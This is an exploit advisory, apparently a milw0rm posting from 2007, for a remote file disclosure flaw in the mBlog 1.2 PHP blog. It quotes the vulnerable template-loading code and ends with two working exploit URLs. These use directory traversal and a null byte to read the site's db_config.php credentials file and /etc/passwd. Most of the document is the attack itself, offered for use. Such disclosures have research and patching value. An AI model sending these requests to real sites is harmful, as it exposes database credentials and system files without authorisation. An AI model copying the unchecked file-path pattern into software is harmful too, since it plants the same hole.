::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: : : : vuln.: mBlog 1.2 Remote File Disclosure Vulnerability : : script info and download: http://www.c97.net/dl/index.php?act=view&id=8 : : no dork for s-kiddie [; : : : : author: irk4z[at]yahoo.pl : : greets to: str0ke, wacky, wszystkich polaków ;] : : : ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: # code: ./includes/tpl.php, 41-56: ... 41 // load_tpl 42 // loding a template file into a varible. 43 // use quick_tpl to display template 44 function load_tpl ($path) 45 { 46 $tpl = ''; 47 global $tpl_block; 48 49 if (substr ($path, -4) == '.tpl') 50 { 51 if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F') OR strpos (Cur_Url (), 'members%2F')) $path = '../'.$path; 52 if (!file_exists ($path)) die ("Template $path not found! Contact webmaster."); 53 $fp = fopen($path,'r'); 54 while(!feof($fp)) $tpl .= fgets($fp,4096); 55 fclose ($fp); 56 } ... load_tpl() 'loading a template file into a varible.' ;] ./index.php, 24-30: ... 24 // proses cmd 25 switch ($mode) 26 { 27 case 'page': 28 $txt['main_body'] = quick_tpl (load_tpl ($config['skin']."/$page.tpl"), 0); 29 flush_tpl (); 30 break; ... file disclosure in $page :* # exploit: (%69%6E%63%6C%75%64%65%73 = includes) http://[host]/[path]/index.php?mode=page&page=../../%69%6E%63%6C%75%64%65%73/db_config.php%00 http://[host]/[path]/index.php?mode=page&page=../../../../../../../../etc/passwd%00 # milw0rm.com [2007-12-21]